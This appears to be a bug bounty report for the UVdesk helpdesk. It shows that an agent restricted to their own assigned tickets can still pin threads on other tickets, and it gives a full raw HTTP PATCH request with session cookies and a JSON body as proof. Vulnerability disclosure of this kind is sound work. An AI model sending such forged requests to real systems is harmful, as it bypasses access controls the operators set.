✍️ BUG

privilege escalation bug to pin a threads

🕵️‍♂️ Proof of Concept

1. Frist from admin account goto http://localhost/uvdesk/public/en/member/agents and add new user called user B with Agent role .
Now gives user-B all tikceting permission like can update/add/edit/delete/lock/pin to a ticket etc .
Also gives bellow permission

Ticket View--->Individual Access

So, here user-B can access only ticket that is assigned to him .

2. Now admin create a new ticket and the ticketing url will be like http://localhost/uvdesk/public/en/member/ticket/view/1 .
Dont assign this ticket to user B .
So, user B should not seee this ticket.\

3. Now goto user B account and here user B cant see above ticket using url http://localhost/uvdesk/public/en/member/ticket/view/1 . user B get permission denied .
Finally user-B sent bellow request to pin a threads

PATCH /en/member/thread/action/6884640 HTTP/1.1
Host: bbounty.uvdesk.com
Cookie: cf_clearance=ef9a97e5ca3741a3a96a4c9831b71f8079ef6ac4-1626160435-0-250; UVSESSID=0000000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bbounty.uvdesk.com/en/member/ticket/view/2
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: https://bbounty.uvdesk.com
Te: trailers
Connection: close
ACCOUNT: TEST2

{"bookmark":1,"id":6884640,"ticketId":"1381331","updateType":"bookmark"}

Here in this url change ticket-id and thread-id and forward the request and see threads is pinned by user-B who does not have permission .

💥 Impact

privilege escalation bug to pin threads .